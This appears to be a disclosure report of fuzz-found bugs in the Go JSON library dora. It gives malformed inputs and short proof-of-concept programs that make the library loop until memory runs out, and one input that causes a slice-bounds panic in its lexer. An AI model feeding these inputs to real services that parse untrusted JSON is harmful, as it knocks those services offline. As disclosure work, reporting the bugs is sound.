Few Bugs in Dora

[cooliscool]

Bug Type #1

Description

The following input strings causes dora to run an infinite loop, eventually consume all memory and the go process gets killed by the OS (Tested in Ubuntu 20.04).

Input strings:

1. {a
2. {'a'}
3. [a[

Post crash dmesg error message (in Ubuntu 20.04 ) :

Out of memory: Killed process 174471 (test) total-vm:16253192kB, anon-rss:15326772kB, file-rss:0kB, shmem-rss:0kB, UID:1001 pgtables:30120kB oom_score_adj:0

Proof of Concept

PoC #1

// PoC.go
package main
import (
	"github.com/bradford-hamilton/dora/pkg/dora"
)

func main() {
	json := `{a`
    dora.NewFromString(json)
}

PoC #2

// PoC.go
package main
import (
	"github.com/bradford-hamilton/dora/pkg/dora"
)

func main() {
	json := `{'a'}`
    dora.NewFromString(json)
}

PoC #3

// PoC.go
package main
import (
	"github.com/bradford-hamilton/dora/pkg/dora"
)

func main() {
	json := `[a[`
    dora.NewFromString(json)
}

To Run

go get -u github.com/bradford-hamilton/dora/pkg/dora

go run PoC.go 

Impact

This can cause the Running Process to consume all available memory on the machine, and eventually get killed by OS (tested in ubuntu 20.04).

Bug Type #2

Description

A bug which causes the go program to have a runtime panic because of slice bounds out of range due to a bug in lexer.go. This bug can be triggered by certain strings that contain 0. For the testcase [[0000// program crashed with the following error :

panic: runtime error: slice bounds out of range [:9] with capacity 8

goroutine 1 [running]:
github.com/bradford-hamilton/dora/pkg/lexer.(*Lexer).readLine(0x4000132440)
        /home/ubuntu/scripts/dora/pkg/lexer/lexer.go:176 +0x120
github.com/bradford-hamilton/dora/pkg/lexer.(*Lexer).readComment(0x4000132440)
        /home/ubuntu/scripts/dora/pkg/lexer/lexer.go:189 +0x11c
github.com/bradford-hamilton/dora/pkg/lexer.(*Lexer).NextToken(0x4000132440)
        /home/ubuntu/scripts/dora/pkg/lexer/lexer.go:54 +0x100
github.com/bradford-hamilton/dora/pkg/parser.(*Parser).nextToken(...)
        /home/ubuntu/scripts/dora/pkg/parser/parser.go:61
github.com/bradford-hamilton/dora/pkg/parser.(*Parser).parseJSONArray(0x400013a4b0)
        /home/ubuntu/scripts/dora/pkg/parser/parser.go:188 +0x16c
github.com/bradford-hamilton/dora/pkg/parser.(*Parser).parseArrayItem(0x400013a4b0)
        /home/ubuntu/scripts/dora/pkg/parser/parser.go:99 +0xc4
github.com/bradford-hamilton/dora/pkg/parser.(*Parser).parseJSONArray(0x400013a4b0)
        /home/ubuntu/scripts/dora/pkg/parser/parser.go:196 +0x240
github.com/bradford-hamilton/dora/pkg/parser.(*Parser).parseValue(0x400013a4b0)
        /home/ubuntu/scripts/dora/pkg/parser/parser.go:79 +0xac
github.com/bradford-hamilton/dora/pkg/parser.(*Parser).ParseJSON(0x400013a4b0)
        /home/ubuntu/scripts/dora/pkg/parser/parser.go:44 +0x8c
github.com/bradford-hamilton/dora/pkg/dora.NewFromString({0xb8400, 0x8})
        /home/ubuntu/scripts/dora/pkg/dora/dora.go:29 +0x104
main.main()
        /home/ubuntu/scripts/dora/test.go:30 +0x1cc
exit status 2

PoC

// PoC.go
package main
import (
	"github.com/bradford-hamilton/dora/pkg/dora"
)

func main() {
	json := `[[0000//`
    dora.NewFromString(json)
}

To Run

go get -u github.com/bradford-hamilton/dora/pkg/dora

go run PoC.go 

Impact

The running Go process crashes

The bugs were found while fuzzing the target using go-fuzz.